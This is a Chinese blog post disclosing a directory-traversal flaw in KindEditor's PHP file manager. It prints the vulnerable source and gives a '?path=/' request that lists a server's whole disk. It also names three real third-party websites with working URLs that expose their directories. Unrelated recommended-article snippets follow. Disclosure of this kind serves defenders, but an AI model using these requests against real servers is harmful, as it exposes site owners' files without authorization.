佚名
佚名

Kindeditor特定情况可能会导致全盘浏览的漏洞

因为例子很少,开始想了下不是他们的漏洞,后面想了下,后面没有检查好用户的正常配置内容导致,还是提下吧。

下载地址:

貌似是最新版本的。

测试语言:PHP
测试漏洞文件:/kindeditor/php/file_manager_json.php
默认配置(第16行):


$root_path = $php_path . '../attached/';

当/attached/文件夹不存在(被删)或者被改名为一个不存在的目录时,如网上的一个例子:

$root_path = $php_path . '../../../upload/';

这个CMS下面的目录根本就没得这个目录,所以就造成了漏洞。

怎么造成了漏洞的呢?我们分析下。

PHP Code 复制内容到剪贴板
  2. /**  
  3.  * KindEditor PHP  
  4.  *  
  5.  * 本PHP程序是演示程序,建议不要直接在实际项目中使用。  
  6.  * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。  
  7.  *  
  8.  */  
  9.   
  10. require_once 'JSON.php';   
  11.   
  12. $php_path = dirname(__FILE__) . '/';   
  13. $php_url = dirname($_SERVER['PHP_SELF']) . '/';   
  14.   
  15. //根目录路径,可以指定绝对路径,比如 /var/www/attached/   
  16. $root_path = $php_path . '../../../upload/';   
  17. //根目录URL,可以指定绝对路径,比如 http://www.yoursite.com/attached/   
  18. $root_url = $php_url . '../../../upload/';   
  19. //图片扩展名   
  20. $ext_arr = array('gif''jpg''jpeg''png''bmp');   
  21.   
  22. //目录名   
  23. $dir_name = emptyempty($_GET['dir']) ? '' : trim($_GET['dir']);   
  24. if (!in_array($dir_namearray('''image''flash''media''file'))) {   
  25. echo "Invalid Directory name.";   
  26. exit;   
  27. }   
  28. if ($dir_name !== '') {   
  29. $root_path .= $dir_name . "/";   
  30. $root_url .= $dir_name . "/";   
  31. if (!file_exists($root_path)) {   
  32. mkdir($root_path);   
  33. }   
  34. }   
  35.   
  36. //根据path参数,设置各路径和URL   
  37. if (emptyempty($_GET['path'])) {   
  38. $current_path = realpath($root_path) . '/';   
  39. $current_url = $root_url;   
  40. $current_dir_path = '';   
  41. $moveup_dir_path = '';   
  42. else {   
  43. $current_path = realpath($root_path) . '/' . $_GET['path'];   
  44. $current_url = $root_url . $_GET['path'];   
  45. $current_dir_path = $_GET['path'];   
  46. $moveup_dir_path = preg_replace('/(.*?)[^\/]+\/$/''$1'$current_dir_path);   
  47. }   
  48. //echo realpath($root_path);   
  49. //排序形式,name or size or type   
  50. $order = emptyempty($_GET['order']) ? 'name' : strtolower($_GET['order']);   
  51.   
  52. //不允许使用..移动到上一级目录   
  53. if (preg_match('/\.\./'$current_path)) {   
  54. echo 'Access is not allowed.';   
  55. exit;   
  56. }   
  57. //最后一个字符不是/   
  58. if (!preg_match('/\/$/'$current_path)) {   
  59. echo 'Parameter is not valid.';   
  60. exit;   
  61. }   
  62. //目录不存在或不是目录   
  63. if (!file_exists($current_path) || !is_dir($current_path)) {   
  64. echo 'Directory does not exist.';   
  65. exit;   
  66. }   
  67.   
  68. //遍历目录取得文件信息   
  69. $file_list = array();   
  70. if ($handle = opendir($current_path)) {   
  71. $i = 0;   
  72. while (false !== ($filename = readdir($handle))) {   
  73. if ($filename{0} == '.'continue;   
  74. $file = $current_path . $filename;   
  75. if (is_dir($file)) {   
  76. $file_list[$i]['is_dir'] = true; //是否文件夹   
  77. $file_list[$i]['has_file'] = (count(scandir($file)) > 2); //文件夹是否包含文件   
  78. $file_list[$i]['filesize'] = 0; //文件大小   
  79. $file_list[$i]['is_photo'] = false; //是否图片   
  80. $file_list[$i]['filetype'] = ''//文件类别,用扩展名判断   
  81. else {   
  82. $file_list[$i]['is_dir'] = false;   
  83. $file_list[$i]['has_file'] = false;   
  84. $file_list[$i]['filesize'] = filesize($file);   
  85. $file_list[$i]['dir_path'] = '';   
  86. $file_ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));   
  87. $file_list[$i]['is_photo'] = in_array($file_ext$ext_arr);   
  88. $file_list[$i]['filetype'] = $file_ext;   
  89. }   
  90. $file_list[$i]['filename'] = $filename//文件名,包含扩展名   
  91. $file_list[$i]['datetime'] = date('Y-m-d H:i:s'filemtime($file)); //文件最后修改时间   
  92. $i++;   
  93. }   
  94. closedir($handle);   
  95. }   
  96.   
  97. //排序   
  98. function cmp_func($a$b) {   
  99. global $order;   
  100. if ($a['is_dir'] && !$b['is_dir']) {   
  101. return -1;   
  102. else if (!$a['is_dir'] && $b['is_dir']) {   
  103. return 1;   
  104. else {   
  105. if ($order == 'size') {   
  106. if ($a['filesize'] > $b['filesize']) {   
  107. return 1;   
  108. else if ($a['filesize'] < $b['filesize']) {   
  109. return -1;   
  110. else {   
  111. return 0;   
  112. }   
  113. else if ($order == 'type') {   
  114. return strcmp($a['filetype'], $b['filetype']);   
  115. else {   
  116. return strcmp($a['filename'], $b['filename']);   
  117. }   
  118. }   
  119. }   
  120. usort($file_list'cmp_func');   
  121.   
  122. $result = array();   
  123. //相对于根目录的上一级目录   
  124. $result['moveup_dir_path'] = $moveup_dir_path;   
  125. //相对于根目录的当前目录   
  126. $result['current_dir_path'] = $current_dir_path;   
  127. //当前目录的URL   
  128. $result['current_url'] = $current_url;   
  129. //文件数   
  130. $result['total_count'] = count($file_list);   
  131. //文件列表数组   
  132. $result['file_list'] = $file_list;   
  133.   
  134. //输出JSON字符串   
  135. header('Content-type: application/json; charset=UTF-8');   
  136. $json = new Services_JSON();   
  137. echo $json->encode($result);  


第三十八行:

$current_path = realpath($root_path) . '/';

当$root_path被realpath以后,不存在的目录会返回空,然后连接后面的'/'

$current_path所以默认就等于'/'

当提交了$_GET['path']以后,而且$_GET['path']要以'/'为结尾(有验证),所以,我们就可以构造浏览全盘目录了。

kingedit/php/file_manager_json.php?path=/ (浏览盘符的根目录)

接着上面给出验证的(互联网找到几个):
先给本地的(attached文件夹被我删了):

Kindeditor特定情况可能会导致全盘浏览的漏洞_第1张图片

Kindeditor特定情况可能会导致全盘浏览的漏洞_第2张图片

互联网找到的:

http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

Kindeditor特定情况可能会导致全盘浏览的漏洞_第3张图片

http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/



http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

Kindeditor特定情况可能会导致全盘浏览的漏洞_第4张图片

修复方案:再验证下绝对路径?

你可能感兴趣的:(Kindeditor特定情况可能会导致全盘浏览的漏洞)

  • C++ list azaz_plus C++c++STLlist
    1.std::list基本概念定义:std::list是C++标准库提供的带头(哨兵位)双向循环链表容器,支持高效的元素插入和删除。头文件:#include2.构造函数(1)默认构造函数listlist1;//创建一个空list,size=0(2)指定初始大小和默认值listlist2(5);//5个元素,默认初始化(int为0)listlist3(5,3.14);//5个元素,每个值为3.14(
  • MCP(Model Context Protocol)模型上下文协议 理论篇1 - 架构 AIQL MCP(ModelContextProtocol)架构ai人工智能MCP
    核心架构理解MCP如何连接客户端、服务器和LLM模型上下文协议(MCP)建立在灵活、可扩展的架构之上,能够实现LLM应用程序和集成之间的无缝通信。本文档涵盖了核心架构组件和概念。概述MCP采用客户端-服务器架构,其中:主机(Hosts)是发起连接的LLM应用程序(例如DesktopApp或IDE)。客户端(Clients)在主机应用程序内部与服务器保持1对1的连接。服务器(Servers)为客户端
  • python 装饰器 每天减 1/5kg python
    装饰器装饰器本质上是一个返回函数的高阶函数,可以接收函数作为参数,并返回一个新的函数。它允许你在不修改原函数代码的情况下,动态地给函数或方法添加额外的功能在我们的日常使用中,装饰器一般用于:日志记录、权限认证、性能分析、缓存等场景。简单示例defmy_decorator(func):defwrapper(*args,**kwargs):print("Beforecallingthefunction
  • 协程与事件循环 每天减 1/5kg python
    协程与事件循环协程协程是一种用户态的轻量级线程,允许在多个任务间高效的切换,而无需依赖操作系统的线程调度。特点协作式多任务:协程主动让出执行权(通过yield或await),而非被操作系统调度(强制中断——抢占式)。状态保存:协程的状态保存在协程的栈中,协程切换时保存上下文(如局部变量、执行位置),恢复时从中断处继续。性能提升:协程相比线程,在切换消耗上性能提升。缺点需要在代码中显式调用,且需要手
  • 支持向量机 (SVM) 算法详解 sssugarr 机器学习算法详解pythonsvm支持向量机算法sklearn
    支持向量机(SVM)算法详解支持向量机(SupportVectorMachine,SVM)是一种监督学习模型,广泛应用于分类和回归分析。SVM特别适合高维数据,并且在处理复杂非线性数据时表现出色。本文将详细讲解SVM的原理、数学公式、应用场景及其在Python中的实现。什么是支持向量机?支持向量机的目标是找到一个最佳的决策边界(或称超平面)来最大限度地分隔不同类别的数据点。对于线性可分的数据,SV
  • python记录运行时间_计算python程序运行时间 weixin_39668408 python记录运行时间
    本文介绍三种方法用来计算python程序的运行时间,考虑多现在计算机都是多进程执行环境,本文介绍的方法,前两种统计了其它进程的时间,实际上是python程序执行开始和结束的时间,只有最后一个方法,是计算的python程序的独自占用的CPU时间,但是python官方已经不再推荐。各位同学可以根据自己的应用情况选择考虑。1,用datatime模块,秒级精度>>>importdatetime>>>dat
  • 京准电钟分享:水利系统NTP网络时间服务器应用 北京华人开创公司 时钟系统北斗卫星授时NTP时间同步网络服务器运维时间同步时钟同步NTP服务器网络时间服务器
    京准电钟分享:水利系统NTP网络时间服务器应用京准电钟分享:水利系统NTP网络时间服务器应用1.项目背景水利控制系统涵盖水文监测、闸门控制、泵站调度、数据采集与传输等多个子系统,设备分布广泛且需协同工作。系统内各设备(如PLC、RTU、SCADA服务器、传感器等)的时间一致性直接影响数据记录的准确性、事件报警的时序性以及故障分析的可靠性。为实现全系统高精度时间同步,需部署NTP(NetworkTi
  • 京准电钟:关于NTP网络时间同步系统应用方案 北京华人开创公司 北斗卫星授时NTP时间同步卫星同步时钟网络大数据时间同步NTP网络授时授时服务卫星授时服务
    京准电钟:关于NTP网络时间同步系统应用方案京准电钟:关于NTP网络时间同步系统应用方案一、背景与需求分析在现代信息化系统中,网络设备、服务器、终端设备的时间同步是保障业务连续性、数据一致性和安全审计的核心基础。时间不同步可能导致以下问题:日志记录时间混乱,影响故障排查;分布式系统事务冲突或数据不一致;安全证书验证失败或攻击行为难以追溯;工业控制、金融交易等高精度场景的时间敏感操作异常。需求目标:
  • 京准电钟推荐:智能交通系统NTP时间同步服务设计方案 北京华人开创公司 时钟系统NTP时间同步卫星同步时钟ntp时钟同步时间同步网络授时网络校时
    京准电钟推荐:智能交通系统NTP时间同步服务设计方案京准电钟推荐:智能交通系统NTP时间同步服务设计方案针对智能交通系统的NTP(NetworkTimeProtocol)时间同步方案设计,需确保交通设备(如信号灯、摄像头、传感器、服务器等)的时间高度一致,以提高系统协同效率和数据分析准确性。以下是完整的方案框架:一、需求分析同步精度核心设备(如信号控制机、边缘服务器)需达到**毫秒级(1-10ms
  • 京准电钟分享:医院网络内NTP时间同步服务器作用是什么? 北京华人开创公司 北斗卫星授时NTP时间同步GPS对时装置NTP时间同步服务器网络时间服务器NTP时间服务器网络系统时钟同步
    京准电钟分享:医院网络内NTP时间同步服务器作用是什么?京准电钟分享:医院网络内NTP时间同步服务器作用是什么?时间同步技术必定将是整个大数据处理系统的重要支撑和保障。时间同步技术使数据产生与处理系统的所有节点具有全局的、统一的标准时间,从而使系统中的所有各种消息、事件、节点、数据等具备正确的逻辑性、协调性以及可追溯性。大数据产生与处理系统是各种计算设备集群的,计算设备将统一、同步的标准时间用于记
  • 时间同步装置(卫星时钟同步)工作原理介绍 北京华人开创公司 卫星同步时钟NTP时间同步大数据自动驾驶神经网络
    时间同步装置(卫星时钟同步)工作原理介绍时间同步装置(卫星时钟同步)工作原理介绍微软从Windows2000开始,系统就支持使用NTP同步的方式获取时间,Windows系统默认的时间源都来自time.windows.com。为了用户使用的方便,time.windows.com以及大多数公网NTP时间服务器没有使用NTP加密方案传输时间,而是使用明文传输。这种公网时间同步方案是非常不可靠的,容易被黑
  • [特殊字符] 用Rust重塑Web开发速度极限:Hyperlane框架——开启高性能服务的「光年时代」[特殊字符] LTPP rust开发语言http服务器后端网络协议高并发
    每秒百万级请求?Rust超新星Hyperlane框架让Web开发突破性能次元壁!颠覆性技术亮点:为何全球顶尖工程师正疯狂迁移至Hyperlane?⚡️「速度即正义」:重新定义Web性能天花板零延迟战场:实测万级并发下延迟低于5ms,让传统框架望尘莫及。Rust内核级优化:基于tokio异步运行时的极致封装,QPS突破5万+,内存占用极低,完美适配边缘计算与云原生场景。️「开发者狂喜」:5分钟极速上
  • Redis数据的删除策略 l1050188952 redis数据库缓存
    Redis是一个key-value存储系统。可基于内存亦可持久化的日志型数据库,一般存储高热度数据,所有数据均存放在内存中,通过TTL指令获取目前状态:-1是永久有效的数据-2是已过期/删除或者是未定义的数据。Redis删除的就是已过期的数据,而过期的数据不会真的删除。redis服务器有很多操作需要执行时,CPU的压力会很大,于是redis中的策略是,在内存还够的前提下,先不释放已删除数据的内存空
  • DeepSeek掘金——IDEA 接入 DeepSeek 写代码的效率翻倍 不二人生 大模型DeepSeek掘金指南intellij-idea大模型deepseek
    IDEA接入DeepSeek写代码的效率翻倍给大家简单介绍一下如何在常用的IDE中接入DeepSeek,这里以Java开发最常用的IDEA为例。目前,IDEA中接入DeepSeek,可以借助CodeGPT和Continue这两个插件。CodeGPT目前用的人最多,稳定性有保障,Continue接入最简单。这两个插件对IDEA版本有要求,IDEA版本太低的话,无法使用。⚠️注意:由于一些特殊原因,目
  • 设计模式——装饰器模式 zzzhpzhpzzz 设计模式装饰器模式
    一、定义与概念定义C++装饰器模式(DecoratorPattern)是一种结构型设计模式,它允许在运行时动态地给对象添加额外的功能,而无需修改对象的原始类结构。该模式通过创建一个装饰类,包装原始对象,并在保持原始对象接口不变的情况下,扩展其功能。核心思想把对象的功能扩展从类的继承关系转变为对象之间的组合关系。通过装饰器类对原始对象进行包装,装饰器类和原始对象实现相同的接口,这样在客户端看来,装饰
  • Python 时间同步程序 东亭山人 Python时间同步
    Python时间同步程序运行结果两种修改本地时间的方法(局域网内,利用网关服务器,穿越代理,与互联网时间同步的方法:前部分用于win7系统,后部分用于winserver2008。需要pip3installntplib需要启动WindowsTime服务。)importwin32apiimportdatetimeimportosimporttimeimportntplibdefSetClockL():
  • MobileNet家族:从v1到v4的架构演进与发展历程 彩旗工作室 人工智能架构人工智能机器学习cnn卷积神经网络
    MobileNet是一个专为移动设备和嵌入式系统设计的轻量化卷积神经网络(CNN)家族,旨在在资源受限的环境中实现高效的图像分类、对象检测和语义分割等任务。自2017年首次推出以来,MobileNet经历了从v1到v4的多次迭代,每一代都在计算效率、模型大小和准确性上取得了显著进步。本文将详细探讨MobileNetv1、v2、v3和v4的原理、架构设计及其发展历程,并分析其关键创新和性能表现。Mo
  • MindSpore:华为全场景AI框架的技术全景与生态实践 彩旗工作室 人工智能人工智能
    一、框架概述MindSpore(昇思)是华为自主研发的全场景AI计算框架,于2020年3月开源,旨在实现易开发、高效执行、灵活部署三大核心目标。作为华为昇腾AI生态的基石,MindSpore支持端、边、云全场景覆盖,并深度融合昇腾处理器的算力特性,提供从模型开发、训练到推理部署的端到端能力。截至2025年,其月度开发者访问量已突破12万,成为国内开源社区最活跃的AI框架之一。二、架构设计MindS
  • 过拟合:机器学习中的“死记硬背”陷阱 彩旗工作室 人工智能机器学习人工智能
    在机器学习中,过拟合(Overfitting)是一个几乎每个从业者都会遇到的经典问题。它像一把双刃剑:当模型过于“聪明”时,可能会陷入对训练数据的过度依赖,从而失去处理新问题的能力。本文将从原理到实践,深入探讨过拟合的本质及应对策略。1.什么是过拟合?过拟合是指模型在训练数据上表现极佳,但在新数据(测试数据或真实场景数据)上表现显著下降的现象。通俗来说,模型像一个“死记硬背的学生”,记住了训练集中
  • Linux系统下装R包又慢又容易报错? NameError_sfj 鸡毛蒜皮linuxr语言
    短话短说:Linux安装默认从源码安装,因此在终端中使用Rconsole装包时会从源码重新编译,这个过程十分耗时,且很容易出错。解决方案有二:1)使用Rstudio/Rstudio-server,因为Rstudio支持预编译安装,直接下载安装编译好的R包,省时省力;2)使用包管理工具,如conda,通过condainstall直接安装R包的预编译版本短话长说版本:打开Linux终端、键入R进入Rc
  • YZ-9846时间同步装置 “四统一、四规范”,确保各时间同步设备时间高精度统一 Leadus 卫星授时技术卫星信号防护技术产品安全服务器运维
    Q:为什么需要时间同步装置?A:因为一些单位或公共场所需要所有的终端设备时间统一,且需要高精度、高可靠性的。什么是YZ-9846时间同步装置?时间同步装置又称时钟装置,包括主时钟和从时钟,根据装置外观、接口种类和数量的不同,提供19″1U/2U/4U三种规格,型号有YZ-9810(1U)、YZ-9820(2U)、YZ-9840(4U)、YZ-9846(“四统一”型号)。YZ-9846时间同步系统由
  • Java高频面试之集合-11 牛马baby java面试哈希算法
    hello啊,各位观众姥爷们!!!本baby今天来报道了!哈哈哈哈哈嗝面试官:详细说说hashmap的put和get操作HashMap的put和get操作是核心功能,其底层通过数组+链表/红黑树实现,结合哈希计算与冲突处理完成键值对的存取。以下是详细流程和关键逻辑分析:一、put操作流程publicVput(Kkey,Vvalue){returnputVal(hash(key),key,value
  • 这些用例设计题,你在面试时遇到过吗? bug管理者 软件测试面试软件测试面试
    功能测试点赞功能:1.点击点赞按钮,是否可以成功点赞,并显示点赞图标和微信昵称;2.点赞成功后是否可以取消点赞;3.没有网络情况下是否可以点赞;4.点赞成功后是否可以评论;5.是否按照点赞顺序进行排序;6.点赞刚好一排可以显示多少头像;7.是否有点赞人数限制;8.是否可以多次点赞/取消点赞;9.点赞成功后,原“点赞”字样是否变为“取消”;10.朋友圈是否可以看到共同好友的点赞;11.是否可以点赞刚
  • 电力时间同步系统,京准电钟电子助力增效 北京华人开创公司 时钟系统卫星同步时钟北斗卫星授时时钟同步时间同步北斗卫星授时授时服务器NTP时间服务器卫星时钟服务器
    电力时间同步系统,京准电钟电子助力增效电力时间同步系统,京准电钟电子助力增效电力时间同步系统是保障电网稳定运行的关键技术,其核心在于为全网的设备提供统一、高精度的时间基准。以下从技术方案、系统设计要点及挑战与解决方案等方面进行详细阐述:一、主要技术方案卫星同步技术GPS/北斗授时:通过接收卫星信号(如GPS或北斗)获取高精度时间源,精度可达微秒级(1μs),适用于故障录波、继电保护等场景。北斗系统
  • java代码接入腾讯云上的deepseek 扣:2037218079 腾讯云云计算ai
    之前已经试过用java代码去调用deepseek官网的api接口了.不管是被攻击还是啥,反正速度不尽人意.正好昨晚看到腾讯云上已经部署了满血的deepseek和其他的大模型,今天写一篇用java去调用deepseek的demo.1:api文档和计费查看.知识引擎原子能力对话-API文档-文档中心-腾讯云上面是api文档的地址需要获取secretid和secretkey还有app_key.前两个是腾
  • 2、3ds Max的界面(3DMAX基础自学系列) weixin_34409703
    一、3dsMax2012中文版的操作界面二、各功能区的介绍1、菜单栏菜单栏位于软件界面顶部,共13个,分别是文件、编辑(E)、工具(T)、组(G)、视图(V)、创建(C)、修改器、动画、图标编译器、渲染(R)、自定义(U)、MAXScript(M)、帮助(H)。可以使用ALT+菜单的字母来打开菜单。①文件左上角的Max图标为文件操作入口,旁边为文件操作的快捷按钮,包含用于管理文件的命令,包括创建、
  • oracle使用PLSQL导出表数据 web_13233421436 面试学习路线阿里巴巴oracle数据库
    数据库课上布置了一个作业利用PL/SQL语言,编写一个存储过程实现针对单张表的数据导出功能,要求将给定表的数据转换成SQL语言的Insert语句,并保存在文件中。该过程以要导出的表名和保存SQL语句的文件名为参数。在网上尝试搜索了一下,中文网里没找到合适的参考文章,要么是针对特定表结构,要么是只导出特定数量的列,于是自己完成后写篇记录。首先需要定义一个导出目录,这里定义了“EXPORT_DIR”C
  • Java实战:Spring Boot application.yml配置文件详解 web_13233421436 面试学习路线阿里巴巴javaspringboot网络
    本文将详细介绍SpringBootapplication.yml配置文件的使用和配置项。我们将探讨application.yml文件的基本概念,以及如何使用它来配置SpringBoot应用程序的各个方面。此外,我们将通过具体的示例来展示如何配置不同的SpringBoot组件,如数据源、数据库、缓存、邮件服务等。本文适合希望深入了解SpringBoot配置文件的开发者阅读。一、引言在SpringBo
  • 【C语言--趣味游戏系列】--电脑关机整蛊小游戏 User_芊芊君子 C语言内容概括c语言游戏电脑
    前言:老铁们,还是那句话,学习很苦游戏来补,为了提高大家与朋友之间的友谊,博主在这里分享一个电脑关机的恶作剧小游戏,快拿去试试吧!!!目录:1.电脑关机代码2.详解1.电脑关机代码#define_CRT_SECURE_NO_WARNINGS#include#include#includeintmain(){charinput[20]={0};system("shutdown-s-t60");whi
  • 安全巡检 Redmaple925 渗透测试网络安全渗透测试安全巡检
    安全巡检目的识别信息系统存在的安全脆弱性、分析信息系统存在的风险,并及时采取措施予以整改,保障信息系统安全稳定运行巡检收益1、通过专业、严谨的安全巡检服务,确保客户IT环境的安全性和稳定性2、大大降低客户的运维风险和运维成本3、专业的安全技术和专业的人员及时、全面的掌握客户IT环境的安全现状和面临的风险,并提出改进建议,降低风险4、客户从反锁的IT运维中解脱出来,更加的关注核心业务,提高工作效率5
  • jdk tomcat 环境变量配置 Array_06 javajdktomcat
    Win7 下如何配置java环境变量 1。准备jdk包,win7系统,tomcat安装包(均上网下载即可) 2。进行对jdk的安装,尽量为默认路径(但要记住啊!!以防以后配置用。。。) 3。分别配置高级环境变量。   电脑-->右击属性-->高级环境变量-->环境变量。 分别配置 : path    &nbs
  • Spring调SDK包报java.lang.NoSuchFieldError错误 bijian1013 javaspring
            在工作中调另一个系统的SDK包,出现如下java.lang.NoSuchFieldError错误。 org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
  • LeetCode[位运算] - #136 数组中的单一数 Cwind java题解位运算LeetCodeAlgorithm
    原题链接:#136 Single Number 要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现两次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间 难度:中等 分析: 题目限定了线性的时间复杂度,同时不使用额外的空间,即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n,故将数组中的每个元素进
  • qq登陆界面开发 15700786134 qq
    今天我们来开发一个qq登陆界面,首先写一个界面程序,一个界面首先是一个Frame对象,即是一个窗体。然后在这个窗体上放置其他组件。代码如下: public class First {         public void initul(){        jf=ne
  • Linux的程序包管理器RPM 被触发 linux
    在早期我们使用源代码的方式来安装软件时,都需要先把源程序代码编译成可执行的二进制安装程序,然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装,这个复杂而艰辛的过程。为简化安装步骤,便于广大用户的安装部署程序,程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包,提供给大家下载,我们只需要根据自己的
  • socket通信遇到EOFException 肆无忌惮_ EOFException
    java.io.EOFException at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
  • 基于spring的web项目定时操作 知了ing javaWeb
    废话不多说,直接上代码,很简单 配置一下项目启动就行 1,web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="h
  • 树形结构的数据库表Schema设计 矮蛋蛋 schema
    原文地址: http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488     程序设计过程中,我们常常用树形结构来表征某些数据的关联关系,如企业上下级部门、栏目结构、商品分类等等,通常而言,这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库,都是以二维表的形式记录存储数据信息,
  • maven将jar包和源码一起打包到本地仓库 alleni123 maven
    http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository <project> ... <build> <plugins> <plugin> <groupI
  • java IO操作 与 File 获取文件或文件夹的大小,可读,等属性!!! 百合不是茶
    类 File File是指文件和目录路径名的抽象表示形式。 1,何为文件: 标准文件(txt doc mp3...) 目录文件(文件夹) 虚拟内存文件   2,File类中有可以创建文件的 createNewFile()方法,在创建新文件的时候需要try{} catch(){}因为可能会抛出异常;也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
  • Spring注入有继承关系的类(2) bijian1013 javaspring
    被注入类的父类有相应的属性,Spring可以直接注入相应的属性,如下所例:1.AClass类 package com.bijian.spring.test4; public class AClass { private String a; private String b; public String getA() { retu
  • 30岁转型期你能否成为成功人士 bijian1013 成长励志
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
  • 【Velocity四】Velocity与Java互操作 bit1129 velocity
    Velocity出现的目的用于简化基于MVC的web应用开发,用于替代JSP标签技术,那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础,      POJO    package com.tom.servlets; public
  • 【Hive十一】Hive数据倾斜优化 bit1129 hive
    什么是Hive数据倾斜问题   操作:join,group by,count distinct 现象:任务进度长时间维持在99%(或100%),查看任务监控页面,发现只有少量(1个或几个)reduce子任务未完成;查看未完成的子任务,可以看到本地读写数据量积累非常大,通常超过10GB可以认定为发生数据倾斜。 原因:key分布不均匀 倾斜度衡量:平均记录数超过50w且
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua csrf
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-3.求子数组的最大和 bylijinnan java
    package beautyOfCoding; public class MaxSubArraySum { /** * 3.求子数组的最大和 题目描述: 输入一个整形数组,数组里有正数也有负数。 数组中连续的一个或多个整数组成一个子数组,每个子数组都有一个和。 求所有子数组的和的最大值。要求时间复杂度为O(n)。 例如输入的数组为1, -2, 3, 10, -4,
  • Netty源码学习-FileRegion bylijinnan javanetty
    今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 可以直接往channel里面写入一个FileRegion对象,而不需要相应的encoder: //pipeline(没有诸如“FileRegionEncoder”的handler): public ChannelPipeline ge
  • 使用ZeroClipboard解决跨浏览器复制到剪贴板的问题 cngolon 跨浏览器复制到粘贴板Zero Clipboard
    Zero Clipboard的实现原理 Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上,这样其实点击的不是按钮而是 Flash ,这样将需要的内容传入Flash,再通过Flash的复制功能把传入的内容复制到剪贴板。 Zero Clipboard的安装方法 首先需要下载 Zero Clipboard的压缩包,解压后把文件夹中两个文件:ZeroClipboard.js
  • 单例模式 cuishikuan 单例模式
    第一种(懒汉,线程不安全): public class Singleton {   2     private static Singleton instance;   3     pri
  • spring+websocket的使用 dalan_123
    一、spring配置文件 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"    xmlns:xsi="http://www.w3.or
  • 细节问题:ZEROFILL的用法范围。 dcj3sjt126com mysql
    1、zerofill把月份中的一位数字比如1,2,3等加前导0 mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL,    -> day
  • Android开发10——Activity的跳转与传值 dcj3sjt126com Android开发
    Activity跳转与传值,主要是通过Intent类,Intent的作用是激活组件和附带数据。   一、Activity跳转 方法一Intent intent = new Intent(A.this, B.class); startActivity(intent)   方法二Intent intent = new Intent();intent.setCla
  • jdbc 得到表结构、主键 eksliang jdbc 得到表结构、主键
    转自博客:http://blog.csdn.net/ocean1010/article/details/7266042 假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
  • Android 应用程序开关GPS gqdy365 android
    要在应用程序中操作GPS开关需要权限: <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> 但在配置文件中添加此权限之后会报错,无法再eclipse里面正常编译,怎么办? 1、方法一:将项目放到Android源码中编译; 2、方法二:网上有人说cl
  • Windows上调试MapReduce zhiquanliu mapreduce
    1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
  • 如何看待一些知名博客推广软文的行为? justjavac 博客
    本文来自我在知乎上的一个回答:http://www.zhihu.com/question/23431810/answer/24588621 互联网上的两种典型心态: 当初求种像条狗,如今撸完嫌人丑 当初搜贴像条犬,如今读完嫌人软 你为啥感觉不舒服呢? 难道非得要作者把自己的劳动成果免费给你用,你才舒服? 就如同 Google 关闭了 Gooled Reader,那是
  • sql优化总结 macroli sql
    为了是自己对sql优化有更好的原则性,在这里做一下总结,个人原则如有不对请多多指教。谢谢!   要知道一个简单的sql语句执行效率,就要有查看方式,一遍更好的进行优化。   一、简单的统计语句执行时间 declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
  • Linux Oracle中常遇到的一些问题及命令总结 超声波 oraclelinux
    1.linux更改主机名   (1)#hostname oracledb    临时修改主机名 (2) vi /etc/sysconfig/network   修改hostname (3) vi /etc/hosts        修改IP对应的主机名   2.linux重启oracle实例及监听的各种方法 (注意操作的顺序应该是先监听,后数据库实例) &nbs
  • hive函数大全及使用示例 superlxw1234 hadoophive函数
      具体说明及示例参 见附件文档。     文档目录:   目录 一、关系运算: 4 1. 等值比较: = 4 2. 不等值比较: <> 4 3. 小于比较: < 4 4. 小于等于比较: <= 4 5. 大于比较: > 5 6. 大于等于比较: >= 5 7. 空值判断: IS NULL 5
  • Spring 4.2新特性-使用@Order调整配置类加载顺序 wiselyman spring 4
